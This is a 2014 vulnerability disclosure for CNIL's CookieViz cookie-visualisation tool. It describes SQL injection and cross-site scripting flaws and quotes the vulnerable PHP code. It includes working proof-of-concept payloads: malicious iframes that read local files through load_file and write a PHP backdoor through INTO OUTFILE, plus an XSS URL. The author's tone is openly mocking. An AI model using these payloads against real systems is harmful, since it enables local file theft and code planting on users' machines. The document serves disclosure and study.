#; CNIL CookieViz Cross Site Scripting / SQL Injection Vul

1. Titulo completo CNIL CookieViz Cross Site Scripting / SQL Injection Vulnerabilities
2. Fecha 2014-11-05
3. Categoria web applications
4. Platforma php
5. CVE CVE-2014-8351,
6. CVE-2014-8352
7.  
8. ================================
9.  
10. Descripcion:
11. CNIL CookieViz suffers from cross site scripting and remote SQL injection vulnerabilities.
12.  
13. ================================
14.  
15. # CNIL CookieViz XSS + SQL injection leading to user pwnage
16. #
17. # Product link: https://github.com/LaboCNIL/CookieViz
18. # CVE references CVE-2014-8351, CVE-2014-8352
19.  
20. TL;DR
21. -----
22. Since October 2014, the French National Commission on Informatics and
23. Liberty "CNIL" is performing some controls upon "tracing cookies" (ads,
24. webaudience etc.) set by French websites:
25. http://www.cnil.fr/linstitution/actualite/article/article/cookies-des-controles-a-partir-doctobre/
26. In order for private individuals to know what cookies are upon browsing
27. teh interwebz, CNIL "experts" generously released the "CookieViz" tool,
28. which is compatible with most of modern Operating Systems (Windows,
29. Linux, OS X):
30. -
31. http://www.cnil.fr/vos-droits/vos-traces/les-cookies/telechargez-cookieviz/
32. - https://github.com/LaboCNIL/CookieViz
33.  
34. Anyone can thus use this tool to check potential tracing infringements.
35. While this intention is definitely laudable, the produced code is
36. dreadful and riddled with ridiculous security vulnerabilities: XSS, SQL
37. injections and security misconfigurations which can lead to a data
38. leakage of the user's files and potentially a compromise by pushing
39. malicious files on his system.
40.  
41. For an organism fighting for citizens' data privacy...exposing them to
42. security troubles is the height of irony.
43.  
44.  
45. PoC
46. ---
47. CookieViz is based on 2 components:
48. - A cookie harvester, which is basically a grep on tshark with http
49. filters on;
50. - A cookie visualizer, which is a more or less fancy HTML GUI relying on
51. d3js.
52.  
53. The 2 components are:
54. - Packaged in a standalone WAMP environment for Windows: both components
55. are notably using the root MySQL account with all privileges (hello
56. FILE), PHP magic quotes are off and so on...
57. - Unpackaged for Linux and Mac OS environments: you have to integrate
58. them in your own (L|M)AMP. In this case, vuln impacts rely only on you
59. and your setup.
60.  
61. The following PoC only focuses on Windows.
62. The scenario is:
63. 0. You install the standalone package;
64. 1. You visit a Website in order to check for its cookies. This website
65. includes malicious resources, like in an iframe, which can for instance:
66. 1.a) read arbitrary local files;
67. 1.b) write any content to non-existing files: you would directly
68. execute arbitrary code on the victim's system but interesting PHP
69. functions like shell_exec(), exec(), passthru() etc. are explicitly
70. disabled in the php.ini
71. 2. You get pwned as the malicious resources are locally executed
72.  
73.  
74. > SQLi injection: CVE-2014-8351
75. -----------------
76. On your malicious website, create an HTML file containing one of these
77. payloads:
78.  
79. 1.a)
80. <!DOCTYPE html>
81. <html>
82. <body>
83. <p>Reading arbitrary local file - C:\CookieViz\conf\php.ini :</p>
84. <iframe src="http://localhost:81/cookie_viz/info.php?domain=*' union
85. all select
86. @@version,2,3,4,5,6,1,load_file('C:\\CookieViz\\conf\\php.ini'),9 --
87. /**">
88. </iframe>
89. </body>
90. </html>
91.  
92.  
93. 1.b) Inb4 : '<?PHP echo "Im pwned " ?>' is converted to a string with
94. MySQL CHAR() function
95. <!DOCTYPE html>
96. <html>
97. <body>
98. <p>Inserting arbitrary PHP code in C:\CookieViz\www\backdoor.php :</p>
99. <iframe src="http://localhost:81/cookie_viz/info.php?domain=*' union
100. all select @@version,2,3,4,5,6,7,CHAR(39, 60, 63, 80, 72, 80, 32, 101,
101. 99, 104, 111, 32, 34, 73, 109, 32, 112, 119, 110, 101, 100, 32, 34, 32,
102. 63, 62, 39),9 INTO outfile 'C:\\CookieViz\\www\\backdoor.php' -- /**">
103. </iframe>
104. </body>
105. </html>
106.  
107. 2) Visit your HTML page with the standalone package browser.
108. 3) Profit.
109.  
110.  
111. > XSS: CVE-2014-8352
112. -----
113. http://localhost/cookieviz/json.php?max_date="><script>alert(1)</script>
114.  
115.  
116. Vuln details
117. -------
118. > SQLi injections:
119. -----------------
120. info.php, line 21:
121.  
122. if(isset($_GET["domain"]))
123. {
124. $domain = $_GET["domain"];
125. }
126. [...]
127. $query="SELECT * FROM url_referer WHERE
128. referer_domains='".$domain."'GROUP BY url_domains, referer_domains";
129. $result = mysql_query($query) or die ("Echec de la requête : ".$query."
130. ". mysql_error());
131. while ($line = mysql_fetch_assoc($result))
132. {
133. echo "<tr>";
134. if ($line["is_cookie"] == 1)
135. {
136. echo "<td>".$line["referer_domains"];
137. echo "<td>".$line["url_domains"];
138. echo "<td>".$line["cookie"];
139. }
140. echo "</tr>";
141. }
142.  
143.  
144. > XSS:
145. -----
146. json.php, line 253:
147.  
148. print
149. '{"inf_nodes":'.$write_nodes.',"inf_links":'.$write_links.',"max_date":"'.$max_date.'","cpt":'.$cpt.'}';
150.  
151. Solution
152. --------
153. - Slutshame CNIL
154. - Wait for patches
155.  
156.  
157. Timeline
158. --------
159. Oct 16, 2014: Getting to know that CNIL released a tool. Visiting the
160. project page and laughing a bit
161. Oct 17, 2014: Requiring CVE, just for trolling purposes
162. Nov 03, 2014: Going fulldisclo, still for trolling purposes